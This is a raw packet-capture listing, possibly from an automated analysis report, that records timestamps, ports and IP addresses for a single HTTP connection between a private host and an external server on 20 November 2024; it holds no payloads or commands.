Nov 20, 2024 07:53:13.069655895 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.069663048 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.069668055 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.069693089 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.069902897 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.069915056 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.069926023 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.069936991 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.069948912 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.069948912 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.069961071 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.069972992 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.069983959 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.069988012 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.069996119 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070005894 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.070010900 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070023060 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070035934 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070046902 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.070070028 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070075035 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.070105076 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.070157051 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070168972 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070180893 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070192099 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070204020 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070209026 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.070216894 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070234060 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.070249081 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070254087 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.070261955 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070272923 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070286036 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070297956 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.070298910 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070311069 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070322037 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070339918 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.070367098 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.070540905 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070553064 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070564985 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070590973 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.070594072 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070607901 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070620060 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070622921 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.070632935 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070643902 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070651054 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.070660114 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070679903 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.070696115 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.070827961 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070841074 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070852995 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.070877075 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.070992947 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.071012974 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.071023941 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.071032047 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.071037054 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.071048021 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.071059942 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.071063042 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.071072102 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.071084023 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.071090937 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.071095943 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.071108103 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.071111917 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.071120977 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.071132898 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.071135998 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.071146011 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.071157932 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.071161985 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.071171045 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.071197033 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.071213961 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.071563005 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.071588993 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.071600914 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.071613073 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.071624041 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.071629047 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.071636915 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.071649075 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.071655989 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.071664095 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.071674109 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.071676016 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.071701050 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.071705103 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.071717978 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.071728945 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.071743011 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.071753979 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.071759939 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.071782112 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.071794987 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.073395014 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.115355968 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.115427971 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.115439892 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.115452051 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.115463972 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.115483999 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.115495920 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.115508080 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.115684032 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.115684032 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.156328917 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.156392097 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.156480074 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.156528950 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.156538010 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.156574011 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.156600952 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.156651974 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.156696081 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.156738043 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.156773090 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.156805992 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.156853914 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.156861067 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.156896114 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.156929970 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.156944990 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.156965017 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.157000065 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.157011986 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.157047987 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.157102108 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.157138109 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.157170057 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.157200098 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.157208920 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.157243013 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.157274961 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.157290936 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.157309055 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.157319069 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.157344103 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.157377005 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.157383919 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.157485962 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.157562971 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.157609940 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.157615900 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.157651901 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.157685995 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.157701015 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.157721043 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.157735109 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.157756090 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.157788992 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.157821894 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.157831907 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.157856941 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.157867908 CET  49707  80  192.168.2.8  216.172.172.178
Nov 20, 2024 07:53:13.157891989 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.157927036 CET  80  49707  216.172.172.178  192.168.2.8
Nov 20, 2024 07:53:13.157933950 CET  49707  80  192.168.2.8  216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.157960892 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.157994032 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158001900 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.158143997 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158193111 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158226967 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158247948 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.158261061 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158276081 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.158294916 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158328056 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158360958 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158373117 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.158395052 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158409119 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.158430099 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158463001 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158508062 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.158518076 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158574104 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158616066 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.158675909 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158718109 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.158725977 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158761024 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158792973 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158812046 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.158832073 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158864975 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158898115 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158909082 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.158931017 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158941031 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.158966064 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.158998013 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159012079 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.159032106 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159065008 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159075022 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.159099102 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159132004 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159141064 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.159167051 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159199953 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159233093 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159255981 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.159265995 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159276962 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.159300089 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159339905 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.159353018 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159387112 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159419060 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159454107 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159467936 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.159490108 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159495115 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.159527063 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159559965 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159574986 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.159593105 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159636974 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159645081 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.159673929 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159707069 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159718990 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.159742117 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159775972 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159809113 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159820080 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.159845114 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159851074 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.159879923 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159913063 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159925938 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.159946918 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159982920 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.159991980 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.160017967 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160052061 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160084009 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160094976 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.160120964 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160155058 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160164118 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.160185099 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160193920 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.160219908 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160252094 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160267115 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.160285950 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160320044 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160351992 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160362005 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.160386086 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160396099 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.160419941 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160456896 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160463095 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.160490990 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160526037 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.160541058 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.202384949 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.202445984 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.202456951 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.202469110 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.202481031 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.202492952 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.202507019 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.202524900 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.202574015 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.242918015 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243063927 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243077040 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243088961 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243099928 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243112087 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243139982 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243158102 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243169069 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243187904 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243200064 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243211031 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243221998 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243232965 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243243933 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243257999 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243269920 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243282080 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243292093 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243304968 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243302107 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243302107 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243302107 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243371964 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243371964 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243371964 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243372917 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243566990 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243578911 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243607998 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243619919 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243627071 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243630886 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243645906 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243657112 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243662119 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243669987 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243680954 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243685961 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243694067 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243710041 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243716955 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243731976 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243743896 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243743896 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243771076 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243786097 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243798018 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243809938 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243827105 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243858099 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.243968010 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243979931 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.243990898 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244003057 CET8049707216.172.172.178192.168.2.8
